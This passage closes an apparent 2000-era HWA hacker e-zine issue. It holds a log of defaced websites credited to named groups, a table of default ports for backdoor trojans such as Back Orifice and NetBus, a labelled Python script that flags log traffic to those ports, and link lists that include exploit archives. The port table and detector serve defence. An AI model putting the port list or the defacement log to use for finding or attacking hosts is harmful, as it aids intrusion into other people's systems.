      [00.03.12] Li [ ]                    University of Dundee Medical School (mesmis.medschool.dundee.ac.uk)
      [00.03.12] NT [ka0x]                 Los Andes (losandes.com.ar)
      [00.03.12] NT [Not Dead]             Computer 2001 (computer2001.co.uk)
      [00.03.11] NT [j0x]                  #2 Parliament of the Russian Federation (www.parliament.ru)
      [00.03.11] NT [Crime Boys]           #2 Civilian Personnel Operations Center Management Agency (cpma.apg.army.mil)
      [00.03.11] NT [Iceburg]              Rivier College (www.rivier.edu)
      [00.03.11] Ir [ ]                    Yamagishi Design Office (www.ntdosokai.org)
      [00.03.11] Li [hektik]               Index 4 PC (www.index4pc.com)
      [00.03.11] NT [ ]                    Handsome Science and Technology Industrial Co. (www.handsome.com.tw)
      [00.03.11] Bf [ActionDirectGroup]    HackZone Russia (www.hackzone.ru)
      [00.03.11] NT [rewted]               Eureka College (www.eureka.edu)
      [00.03.11] BI [dfs]                  Dead Protocol Society (www.deadprotocol.org)
      [00.03.11] NT [rewted]               Cumberland College (www.cumber.edu)
      [00.03.11] NT [rewted]               Avila College (www.avila.edu)
      [00.03.11] La [mojo]                 Han Bee Industrial (hanbee.co.kr)
      [00.03.10] NT [Crime Boys]           #2 ROTC, Second Region Headquarters, Fort Knox (www.2rotc.army.mil)
      [00.03.10] NT [nore]                 #2 Poder Judicial de Santa Fe (santafe.poderjudicial-sfe.gov.ar)
      [00.03.10] NT [fox]                  Alabama State Legislature Web site (www.legislature.state.al.us)
      [00.03.10] NT [Cyber Fuckers]        Parliament of the Russian Federation (www.parliament.ru)
      [00.03.10] NT [Mayhem]               Tebecai Telecom B.V. (www.tebenet.nl)
      [00.03.10] NT [Neon-Lenz]            Sensible Computer Solutions (www.sensible-net.com)
      [00.03.10] NT [Neon-Lenz]            Hotel & Restaurantskolen (www.hrs.dk)
      [00.03.10] Lm [ ]                 C  GNerds (www.gnerds.com)
      [00.03.10] NT [ICE]                  Danish Music Agency (www.dmamusic.dk)
      [00.03.10] NT [Pakistan HC]      M   Zee Network (www.zeenews.com)
      [00.03.10] Li [dutp0k]           M   Hearth Reality (www.hearth-realty.com)
      [00.03.09] NT [Cyber Fuckers]     C  Iran Ministry of Health and Medical Education (www.mohem.gov.ir)
      [00.03.09] NT [IZ corp.]             Finaciadora de Estudos e Projetos (www.finep.gov.br)
      [00.03.09] So [n30]                  Zed Kidz Ltd. (www.zed.co.uk)
      [00.03.09] NT [OursTeam]             Global Aviation Information Network (www.gainweb.org)
      [00.03.09] NT [ ]                    Fertilance Equipamentos Ltda (www.fertilance.com.br)
      [00.03.08] NT [nore]                 #2 Office of the Speaker of the House (www.speaker.gov)
      [00.03.08] NT [j0x]                  #2 The Gallup Organization (www.gallup.com)
      [00.03.08] NT [ ]                    Web List Brazil (www.weblistbr.com.br)
      [00.03.08] NT [ ]                    Unihold Administração Partic. Ltda (www.unihold.com.br)
      [00.03.08] Li [h3xx0r]               Solincs (www.solincs.com)
      [00.03.08] NT [mr_ozzy]              Serviço de Aprendizado Rural ao Adolecente (www.projetosara.org.br)
      [00.03.08] NT [mr_ozzy]              MetalNet Brazil (www.metalnet.com.br)
      [00.03.08] Li [h3xx0r]               Irfan Textiles (www.irfantextiles.com)
      [00.03.08] NT [nore]                 Houston Advanced Research Center (www.harc.edu)
      [00.03.08] Bf [Saiko-Pod]            Fragile (www.fragile.org)
      [00.03.08] NT [ ]                M   Disktrans Comercial Ltda (www.disktrans.com.br)
      [00.03.07] Lb [sil]              M   Bamchef (www.bamchef.com)
      [00.03.07] NT [ka0x]                 Washington State Military Department (cpmurray-www.army.mil)
      [00.03.07] NT [Team Illusions]       These Last Days Ministries (www.tldm.org)
      [00.03.07] NT [Team Illusions]       Southern New England Telephone (www.snet.com)
      [00.03.07] Bf [mojo]                 Phlux (www.phlux.org)
      [00.03.07] Ir [crazy_bit]         C  Pandawa Lima (www.pandawa5.com) 
      [00.03.07] NT [RAT]                  ALON Israel Oil Company (www.oak.co.il)
      [00.03.07] NT [fox]                  Michigan Department of Agriculture (www.mda.state.mi.us)
      [00.03.07] NT [#phreak.nl]        C  Faculty of Information Technology and Systems, Technische Universiteit Delft (www.its.tudelft.nl)
      [00.03.07]    [mr_min]               E-Financial Inc (www.efin.com)
      [00.03.07] So [Ph33r the b33r]       Behold.Net (www.behold.net)
      [00.03.07] NT [CyberArmy]            Aapexx Corp (www.aapexx.com)
      [00.03.07] NT [ka0x]                 Clarín Digital (chat.clarin.com.ar)
      [00.03.07] NT [CIH]                  FMC Corporation, Farming Solutions (ag.fmc.com)
      [00.03.06] Li [shock troops]     M   The Lab, Inc (www.thelabinc.com)
      [00.03.06] Li [shock troops]     M   Suede Records (www.suederecords.com)
      [00.03.06] NT [Team Infinity]        Peterborough Council (www.peterborough.gov.uk)
      [00.03.06] NT [Artech]               St. Aubin Technologies, Inc. (www.st-aubin.org)
      [00.03.06] NT [Team Infinity]        Raleigh, North Carolina (www.raleigh-nc.org)
      [00.03.06] NT [Hack 2600]            Malaysia Airlines (www.malaysiaairlines.com.my)
      [00.03.06] NT [Pakistan HC]          Made in India (www.madeinindia.com)
      [00.03.06] NT [Team Infinity]        League of Minnesota Cities (www.lmnc.org)
      [00.03.06] NT [Artech]               Homestead Transfer & Storage Co. (www.homesteadtransfer.com)
      [00.03.06] NT [Team Infinity]        Edison Township (www.edisonnj.org)
      [00.03.06] Ls [Kaw00t]               Baldermann GmbH (www.darc.de)
      [00.03.06] NT [Team Infinity]        City of Bowie (www.cityofbowie.org)
      [00.03.06] Li [mojo]                 National Penghu Institute of Marine & Management Technology (travel.ph.edu.tw)
      [00.03.06] NT [nore]                 University of Florida Department of Anesthesiology (gasser.anest.ufl.edu)
      [00.03.06] NT [crazy bit]            Tee Plus (www.teeplus.com)
      [00.03.06] Li [shock troops]         Suede Records (www.suederecords.com)
      [00.03.06] La [mojo]                 Masan City Hall (webmail.masan.kyongnam.kr)
      [00.03.05] NT [AntiOnline]        C  The Gallup Organization (www.gallup.com)
      [00.03.05] Bf [ ]                    Wired Connection (www.wiredconnection.org)
      [00.03.05] Bf [b1n-l4d3n hac0rz]     Vanier College (www.vaniercollege.net)
      [00.03.05] NT [Artech]               Name Our Child (www.nameourchild.com)
      [00.03.05]    [ ]                    Mashal Books (www.mashalbooks.com)
      [00.03.05] Li [OHB]                  Laboratório de Matemática Aplicada da Universidade Federal do Rio de Janeiro (www.labma.ufrj.br)
      [00.03.05] NT [Cyber Fuckers]        Elite Calendar (www.elitecalendar.com)
      [00.03.05] Lr [OHB]                  Centro de processamento de Dados do Rio de Janeiro (www.alerj.rj.gov.br)
      [00.03.04] NT [CIH]                  Universita degli Studi di Parma (www.ceda.unipr.it)
      [00.03.04] NT [Pakistani HC]         Parliament of India (alfa.nic.in)
      [00.03.04] NT [ph33r the b33r]       United Network for Organ Sharing (www.unos.org)
      [00.03.04] NT [Artech]           M   UK Jobs (www.uk-jobs.co.uk)
      [00.03.04] NT [CIH]                  Tennessee State University (www.tnstate.edu)
      [00.03.04] NT [CIH]                  St. Louis Metropolitan Sewer District (www.stlmsd.com)
      [00.03.04] NT [CIH]                  College of the Siskiyous (www.siskiyous.edu)
      [00.03.04] NT [Cyber Fuckers]        Russian Scientific Center for Legal Information, Ministry of Justice (www.scli.ru)
      [00.03.04] NT [CIH]                  RomTec Plc (www.romtec.co.uk)
      [00.03.04] NT [Tr1pl3 S31S]       C  Race Lesotho (www.race.co.ls)
      [00.03.04] NT [CIH]                  Monmouth College (www.monm.edu)
      [00.03.04] NT [CIH]                  University of St. Thomas Library (www.lib.stthomas.edu)
      [00.03.04] NT [Cyber Fuckers]        Int Idea Sweden (www.int-idea.se)
      [00.03.04] NT [CIH]                  Goddard College (www.goddard.edu)
      [00.03.04] NT [Cyber Fuckers]        Association of EDI Users (www.editrans.ru)
      [00.03.04] NT [CIH]                  Bitstop, Inc (www.dagupan.com)
      [00.03.04] BI [K0ad]             M   Custom Systems (www.customcomsystems.com)
      [00.03.04] Li [Azid Forze]           Classic Amiga (www.classicamiga.com)
      [00.03.04] NT [HackUnity]            98 Skate (www.98skate.org)
      [00.03.04] BI [K0ad]                 CU Naked (cunaked.net)
      [00.03.04] So [ ]                    Korea National University of Education (cc-sun.knue.ac.kr)
      [00.03.03]    [ ]                    Playstation 2 (www.playstation2.co.jp)
      [00.03.03] NT [CIH]                  Association for Windows NT System Professionals (www.ntpro.org)
      [00.03.03] NT [ ]                    K.Net Telecomunicações Ltda. (www.knet.com.br)
      [00.03.03]    [kernel panic]         CyberCT Malaysia (www.cyberct.com.my)
      [00.03.03] NT [ ]                    Birmingham Windows NT User Group (www.bwntug.org)
      [00.03.03] NT [Tr1pl3 S31S]       C  Bloem S.A. (www.bloem.co.za)
      [00.03.03] NT [bash]                 Aware, Inc. (www.aware.com)
      [00.03.03] NT [Pakistani HC]         Ahmedabad Telephone Online Directory, Ahmedabad Telecom District (www.amtel.gov.in)
      [00.03.03] Li [h3xx0r]               Fly Pakistan (fly.com.pk)
      [00.03.02] NT [zillion]              Quality Business Solutions (www.qbs.com.au)
      [00.03.02] NT [zillion]              Out (www.outvak.nl)
      [00.03.02] NT [RAT]                  Internet Exposure (www.iexposure.com)
      [00.03.02] NT [hack.be]              Belgium Province de Hainaut (www.hainaut.be)
      [00.03.02] NT [Team Zero G]          Glen Cove School District (www.glencove.k12.ny.us)
      [00.03.02] NT [team infinity]        Germantown Academy (www.ga.k12.pa.us)
      [00.03.02] NT [hack.be]              Federatie van Wervings- en Selectiebureaus (www.fws.be)
      [00.03.02] NT [Pakistani HC]         Engineering Export Promotion Council, Ministry of Commerce, India (www.eepc.gov.in)
      [00.03.01] NT [ADM]               C  AntiOnline's AntiCode (www.anticode.com)
      [00.03.01] Bn [Haks-r-us]            Pigman (pigman.octothorpe.com)
      [00.03.01] Li [h3xx0r]               Lasani (www.lasani.com)
      [00.03.01] NT [team infinity]        What Online (www.what.com)
      [00.03.01]    [Starman_Jones]        Weston High School (www.westonhighschool.com)
      [00.03.01] NT [OHB]                  Vasco Boutique (www.vascoboutique.com.br)
      [00.03.01] NT [team infinity]        True Systems (www.true.com)
      [00.03.01] NT [Crime Boys]           Siemens Italy (www.siemens.it)
      [00.03.01] NT [zillion]              Progress Korea (www.progress.co.kr)
      [00.03.01] NT [team infinity]        Phase Devices Ltd. (www.phase.com)
      [00.03.01] NT [ ]                    National Treasury Employees Union (www.nteu.org)
      [00.03.01] NT [ ]                    National Postal Mail Handlers Union (www.npmhu.org)
      [00.03.01]    [GForce Pakistan]  M   Metricks (www.metricks.com)
      [00.03.01] NT [team infinity]        Massachusetts Higher Education Network (www.mass.edu)
      [00.03.01] Li [ ]                    The London Institute (www.linst.ac.uk)
      [00.03.01] Lr [MAN KEKE KTNX]        Fort Campbell School System (tech.fced.org)
      [00.03.01] NT [MaStErBiLL]           MaxiDATA Tecnologia e Informatica Ltda (listas.maxidata.com)
        and more sites at the attrition cracked web sites mirror:

                     http://www.attrition.org/mirror/attrition/index.html 
 
       -------------------------------------------------------------------------
       
  A.0                              APPENDICES
       _________________________________________________________________________
       
      By: joakim.von.braun@risab.se 
      Source: PSS
       
      Common Trojan ports to watch for:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      After seeing several questions about traffic directed at ports such as 31337
      and 12345, I've put together a list of all trojans known to me and the
      default ports they are using. Of course several of them could use any port,
      but I hope this list will maybe give you a clue of what might be going on.
      
      port    21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx,
                   WinCrash
      port    23 - Tiny Telnet Server
      port    25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz
                   Stealth, Terminator, WinPC, WinSpy
      port    31 - Hackers Paradise
      port    80 - Executor
      port   456 - Hackers Paradise
      port   555 - Ini-Killer, Phase Zero, Stealth Spy
      port   666 - Satanz Backdoor
      port  1001 - Silencer, WebEx
      port  1011 - Doly Trojan
      port  1170 - Psyber Stream Server, Voice
      port  1234 - Ultors Trojan
      port  1245 - VooDoo Doll
      port  1492 - FTP99CMP
      port  1600 - Shivka-Burka
      port  1807 - SpySender
      port  1981 - Shockrave
      port  1999 - BackDoor
      port  2001 - Trojan Cow
      port  2023 - Ripper
      port  2115 - Bugs
      port  2140 - Deep Throat, The Invasor
      port  2801 - Phineas Phucker
      port  3024 - WinCrash
      port  3129 - Masters Paradise
      port  3150 - Deep Throat, The Invasor
      port  3700 - Portal of Doom
      port  4092 - WinCrash
      port  4590 - ICQTrojan
      port  5000 - Sockets de Troie
      port  5001 - Sockets de Troie
      port  5321 - Firehotcker
      port  5400 - Blade Runner
      port  5401 - Blade Runner
      port  5402 - Blade Runner
      port  5569 - Robo-Hack
      port  5742 - WinCrash
      port  6670 - DeepThroat
      port  6771 - DeepThroat
      port  6969 - GateCrasher, Priority
      port  7000 - Remote Grab
      port  7300 - NetMonitor
      port  7301 - NetMonitor
      port  7306 - NetMonitor
      port  7307 - NetMonitor
      port  7308 - NetMonitor
      port  7789 - ICKiller
      port  9872 - Portal of Doom
      port  9873 - Portal of Doom
      port  9874 - Portal of Doom
      port  9875 - Portal of Doom
      port  9989 - iNi-Killer
      port 10067 - Portal of Doom
      port 10167 - Portal of Doom
      port 11000 - Senna Spy
      port 11223 - Progenic trojan
      port 12223 - Hack'99 KeyLogger
      port 12345 - GabanBus, NetBus
      port 12346 - GabanBus, NetBus
      port 12361 - Whack-a-mole
      port 12362 - Whack-a-mole
      port 16969 - Priority
      port 20001 - Millennium
      port 20034 - NetBus 2 Pro
      port 21544 - GirlFriend
      port 22222 - Prosiak
      port 23456 - Evil FTP, Ugly FTP
      port 26274 - Delta
      port 31337 - Back Orifice
      port 31338 - Back Orifice, DeepBO
      port 31339 - NetSpy DK
      port 31666 - BOWhack
      port 33333 - Prosiak
      port 34324 - BigGluck, TN
      port 40412 - The Spy
      port 40421 - Masters Paradise
      port 40422 - Masters Paradise
      port 40423 - Masters Paradise
      port 40426 - Masters Paradise
      port 47262 - Delta
      port 50505 - Sockets de Troie
      port 50766 - Fore
      port 53001 - Remote Windows Shutdown
      port 61466 - Telecommando
      port 65000 - Devil
      
      You'll find the list on the following address:
      http://www.simovits.com/nyheter9902.html  (still in Swedish but it will be
      translated in the near future).
      
      To help anyone to detect trojan attacks, I'm planning to add information
      about the original names of the executables, their size, where they usually
      are hiding, and the names of any helpfiles they may use. I will also add
      tools or links to tools that may be of your assistance.
      
      Feel free to get back to me with any comments or suggestions. If you find
      new trojans I'll love to get my hands on them, but please mail me first, as
      I don't need more than one copy. If you have live experience of trojan
      attacks I'm interested to read about your findings.
      
      Joakim
      
      joakim.von.braun@risab.se
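      To turn the list into something a firewall or IDS operator can act on, here is an added example (not code from this issue or from Joakim's list) that embeds a subset of the table above and scans constructed firewall-style log lines for traffic to those ports, flagging the ports that normal services share as low confidence and spotting a single source that touches several trojan ports. The log format, SAMPLE_LOG and the function names are assumptions of the example.

```python
"""Flag traffic to the default trojan ports from the list above.

Added example, not part of the HWA issue or Joakim von Braun's list.
Scans constructed firewall-style log lines against a subset of that
table. Caveats the list itself raises: many of these trojans can be set
to any port, and some defaults (21, 23, 25, 80) are shared with normal
services, so hits there are weak signals. Protocol is not given in the
list, so both tcp and udp are matched.
"""
import re
from collections import defaultdict

# Subset of the port list above, keyed by default port.
TROJAN_PORTS = {
    21: ["Blade Runner", "Doly Trojan", "Fore", "Invisible FTP", "WebEx", "WinCrash"],
    25: ["Antigen", "Email Password Sender", "Haebu Coceda",
         "Shtrilitz Stealth", "Terminator", "WinPC", "WinSpy"],
    80: ["Executor"],
    12345: ["GabanBus", "NetBus"],
    12346: ["GabanBus", "NetBus"],
    31337: ["Back Orifice"],
    31338: ["Back Orifice", "DeepBO"],
    65000: ["Devil"],
}
# Listed ports that ordinary services also use; hits here are low confidence.
SHARED_SERVICE_PORTS = {21: "ftp", 23: "telnet", 25: "smtp", 80: "http"}

# Constructed log format (assumed, not any real product's):
# "<time> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <action>"
LOG_RE = re.compile(
    r"^(?P<time>\S+)\s+(?P<proto>tcp|udp)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<action>\w+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
    return rec


def classify(dport):
    """Return (trojan names, shared service name or None), or None if unlisted."""
    names = TROJAN_PORTS.get(dport)
    return None if names is None else (names, SHARED_SERVICE_PORTS.get(dport))


def scan(lines):
    """Return (alerts, ports_by_source): one alert dict per hit on a listed
    port ("high" for trojan-only ports, "low" for ports a normal service
    shares), plus the sorted listed ports each source address touched."""
    alerts = []
    ports_by_source = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable lines are skipped, not treated as hits
        hit = classify(rec["dport"])
        if hit is None:
            continue
        names, shared = hit
        alerts.append({
            "time": rec["time"], "src": rec["src"], "dst": rec["dst"],
            "proto": rec["proto"], "dport": rec["dport"], "names": names,
            "severity": "low" if shared else "high",
        })
        ports_by_source[rec["src"]].add(rec["dport"])
    return alerts, {src: sorted(p) for src, p in ports_by_source.items()}


def suspected_sweeps(ports_by_source, threshold=2):
    """Sources that touched at least `threshold` distinct trojan-only ports."""
    return sorted(
        src for src, ports in ports_by_source.items()
        if sum(p not in SHARED_SERVICE_PORTS for p in ports) >= threshold
    )


# Constructed sample log using documentation addresses, not real hosts.
SAMPLE_LOG = [
    "10:01:02 tcp 198.51.100.7:4312 -> 192.0.2.10:80 accept",
    "10:01:05 tcp 198.51.100.7:4313 -> 192.0.2.10:12345 deny",
    "10:01:06 tcp 198.51.100.7:4314 -> 192.0.2.10:31337 deny",
    "10:01:09 tcp 203.0.113.5:51000 -> 192.0.2.10:22 accept",
    "10:01:11 udp 203.0.113.5:51001 -> 192.0.2.10:31337 deny",
    "this line is not in the expected format",
]

if __name__ == "__main__":
    found, by_src = scan(SAMPLE_LOG)
    for a in found:
        print(f"[{a['severity']}] {a['time']} {a['src']} -> {a['dst']}:"
              f"{a['dport']}/{a['proto']} {', '.join(a['names'])}")
    print("possible trojan port sweeps from:", suspected_sweeps(by_src))
```

      A "high" alert on 12345 or 31337 still deserves a look at the destination host rather than an automatic verdict, since the list gives defaults only.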


  A.1 PHACVW, sekurity, security, cyberwar links
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      The links are no longer maintained in this file; there is now a
      links section at http://welcome.to/HWA.hax0r.news/ so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
      
      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
      
      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      
      
      
      HWA.hax0r.news Mirror Sites around the world:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW **
      http://datatwirl.intranova.net  ** NEW **
      http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
      http://net-security.org/hwahaxornews ** NEW **
      http://www.sysbreakers.com/hwa ** NEW **
      http://www.attrition.org/hosted/hwa/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://www.hackunlimited.com/zine/hwa/ *UPDATED*
      http://www.ducktank.net/hwa/issues.html ** NEW **
      http://www.alldas.de/hwaidx1.htm ** NEW **
      http://www.csoft.net/~hwa/ 
      http://www.digitalgeeks.com/hwa *DOWN*
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://archives.projectgamma.com/zines/hwa/
      http://www.403-security.org/Htmls/hwa.hax0r.news.htm
      http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
      http://hwa.hax0r.news.8m.com/           
      http://www.fortunecity.com/skyscraper/feature/103/  
      

      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondents and others, please send in links to news sites
      that carry security news from other countries, for inclusion in this
      list. Thanks... - Ed

      
      Belgium.......: http://securax.org/cum/ *New address*
      (Dutch)         http://www.securax.org/ *New*
      
      Brasil........: http://www.psynet.net/ka0z
                      http://www.elementais.cjb.net
      
      Canada........: http://www.hackcanada.com
      
      Croatia.......: http://security.monitor.hr
      
      Colombia......: http://www.cascabel.8m.com
                      http://www.intrusos.cjb.net
      
      Finland.......: http://hackunlimited.com/
      
      Germany.......: http://www.alldas.de/
                      http://www.security-news.com/
      
      Indonesia.....: http://www.k-elektronik.org/index2.html
                      http://members.xoom.com/neblonica/
                      http://hackerlink.or.id/
      
      Netherlands...: http://security.pine.nl/
      
      Russia........: http://www.tsu.ru/~eugene/
      
      Singapore.....: http://www.icepoint.com
      
      South Africa..: http://www.hackers.co.za
                      http://www.hack.co.za ** DOWN AGAIN **
                      http://www.posthuman.za.net
      
      Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                                               and best security related e-zine.
      
    .za (South Africa) sites contributed by wyzwun tnx guy...                  
      
      


    Got a link for this section? Email it to cruciphux@dok.org and I'll
    review it and post it here if it merits it.
    
    @HWA
    
A.2 Hot Hits
    ~~~~~~~~    
    
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
    
    
       Today the spotlight may be on you, some interesting machines that
                  have accessed these archives recently...
               
                               _   _       _
                              | | | | ___ | |_
                              | |_| |/ _ \| __|
                              |  _  | (_) | |_
                              |_| |_|\___/ \__|
                               _    _ _ _
                              | |  | (_) |
                              | |__| |_| |_ ___
                              |  __  | | __/ __|
                              | |  | | | |_\__ \
                              |_|  |_|_|\__|___/
                              
                            .gov and .mil activity
                            
                             Updated Feb 2000
                             
    There are some interesting machines among these, the *.nosc.mil boxes are
    from SPAWAR information warfare centres, good Is It Worth It Followup to see
    our boys keeping up with the news... - Ed                             
  
    @HWA


A.3 Mirror Sites List
    ~~~~~~~~~~~~~~~~~
    
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
  
                       __  __ _
                      |  \/  (_)_ __ _ __ ___  _ __ ___
                      | |\/| | | '__| '__/ _ \| '__/ __|
                      | |  | | | |  | | | (_) | |  \__ \
                      |_|  |_|_|_|  |_|  \___/|_|  |___/
                      
                      
                      
   Some of these are not keeping up with new issues like they should be; you
   can always get the latest issue from www.csoft.net/~hwa, or join us on IRC
   (EFnet) in channel #hwa.hax0r.news and check the topic or ask Cruciphux
   where the latest issues can be obtained. I also upload all issues to
   etext.org; the zines are available through their FTP service, but updates
   are slow. - Ed

                       


     New mirror sites
               
  ***   http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp   *** NEW *** 
  ***   http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ ***      
        http://datatwirl.intranova.net * NEW * 
        http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
        http://net-security.org/hwahaxornews     
        http://www.attrition.org/hosted/hwa/
        http://hwazine.cjb.net/   
        http://www.hackunlimited.com/files/secu/papers/hwa/
        http://www.attrition.org/~modify/texts/zines/HWA/                                
      * http://hwa.hax0r.news.8m.com/           
      * http://www.fortunecity.com/skyscraper/feature/103/  
               
      * Crappy free sites of no use to anyone. Too lazy to kill em.
     
                
    *** Most likely to be up to date other than the main site.    
                        
                        
     
     HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
     thanks to airportman for the Cubesoft bandwidth. Also shouts out to all 
     our mirror sites! and p0lix for the (now expired) digitalgeeks archive
     tnx guys. 
     
     http://www.csoft.net/~hwa
     
     
     HWA.hax0r.news Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp
     http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
     http://www.attrition.org/hosted/hwa/
     http://www.attrition.org/~modify/texts/zines/HWA/     
     http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
     http://www.csoft.net/~hwa/           
     http://welcome.to/HWA.hax0r.news/ 
     http://www.projectgamma.com/archives/zines/hwa/
     http://www.403-security.org/Htmls/hwa.hax0r.news.htm
     
     
     @HWA
     
     
  
A.4  The hacker's Ethic (90's Style)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
     
     
          _   _            _             _    _____ _   _     _
         | | | | __ _  ___| | _____ _ __( )__| ____| |_| |__ (_) ___
         | |_| |/ _` |/ __| |/ / _ \ '__|/ __|  _| | __| '_ \| |/ __|
         |  _  | (_| | (__|   <  __/ |   \__ \ |___| |_| | | | | (__
         |_| |_|\__,_|\___|_|\_\___|_|   |___/_____|\__|_| |_|_|\___|



     Sadly, due to the traditional ignorance and sensationalizing of the mass
     media, the once-noble term hacker has become a pejorative.
     
     Among true computer people, being called a hacker is a compliment. One of
     the traits of the true hacker is a profoundly antibureaucratic and
     democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
     
     This ethic was best formulated by Steven Levy in his 1984 book Hackers:
     Heroes of the Computer Revolution. Its tenets are as follows:

      1 - Access to computers should be unlimited and total. 
      2 - All information should be free. 
      3 - Mistrust authority - promote decentralization. 
      4 - Hackers should be judged by their hacking not bogus criteria such as
          degrees, age, race, or position. 
      5 - You create art and beauty on a computer.
      6 - Computers can change your life for the better. 

     The Internet as a whole reflects this ethic.
     
     @HWA
     
A.5  Sources *** (VERY incomplete)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                      ____
                     / ___|  ___  _   _ _ __ ___ ___ ___
                     \___ \ / _ \| | | | '__/ __/ _ Y __|
                      ___) | (_) | |_| | | | (_|  __|__ \
                     |____/ \___/ \__,_|_|  \___\___|___/


    Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance). Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information are compiled
    and/or sourced by Cruciphux; no copyright claimed.


    News site.........................http://www.ukhackers.com/  *NEW*
    News site.........................http://www.hackernews.com.br/ *NEW* 
    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
   *News site (HNN) .................http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
    NewsTrolls .(daily news ).........http://www.newstrolls.com/
    General Security/Exploits.........http://packetstorm.securify.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+Security................http://www.gammaforce.org/
    News site+Security................http://www.projectgamma.com/
    News site+Security................http://securityhole.8m.com/
    News site+Security related site...http://www.403-security.org/ 
    News/Humour site+ ................http://www.innerpulse.com
    News/Techie news site.............http://www.slashdot.org
    
    * HNN Also archives back issues of their news, use the following url format
    
      http://www.hackernews.com/arch.html?012700
    
      where 01 = month (Jan), 27 = day of month, 00 = year. They are archived
      here also as part of the compilation and broad archival concept we are
      trying to maintain with this publication. - Ed
    
    

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    win2kbugtraq
    <+others>
    
    @HWA
    
    
    
A.6 Resources
    ~~~~~~~~~     
                       ___
                      | _ \___ ______ _  _ _ _ __ ___ ___
                      |   / -_|_-< _ \ || | '_/ _/ -_|_-<
                      |_|_\___/__|___/\_,_|_| \__\___/__/


    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    PLEASE if you have any changes or additions for this section please
    mail them to cruciphux@dok.org. Thank you.
    
    
    http://www.newsnow.co.uk/-NewsFeed.Tech.htm  *NEW* from Tep
    
    http://www.cnn.com/SEARCH/
       
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
        
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
        
    http://www.ottawacitizen.com/business/
        
    http://search.yahoo.com.sg/search/news_sg?p=hack
        
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
        
    http://www.zdnet.com/zdtv/cybercrime/
        
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
        
    NOTE: See appendices for details on other links.
    


    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
        
    http://freespeech.org/eua/ Electronic Underground Affiliation
        
    http://ech0.cjb.net ech0 Security
    
    http://axon.jccc.net/hir/ Hackers Information Report
        
    http://net-security.org Net Security
        
    http://www.403-security.org Daily news and security related site
    
    http://www.hack.co.za/ Current exploits archive  ** DOWN **
    
    ** Due to excessive network attacks this site was being mirrored
       at http://www.siliconinc.net/hack/ ; if the above link is down again try here.

    Please send in links that you think should belong here to keep this section
    up to date, it is overdue for updating!
    
        

A.7  Submissions/Hints/Tips/Etc
     ~~~~~~~~~~~~~~~~~~~~~~~~~~
    
            ____        _               _         _
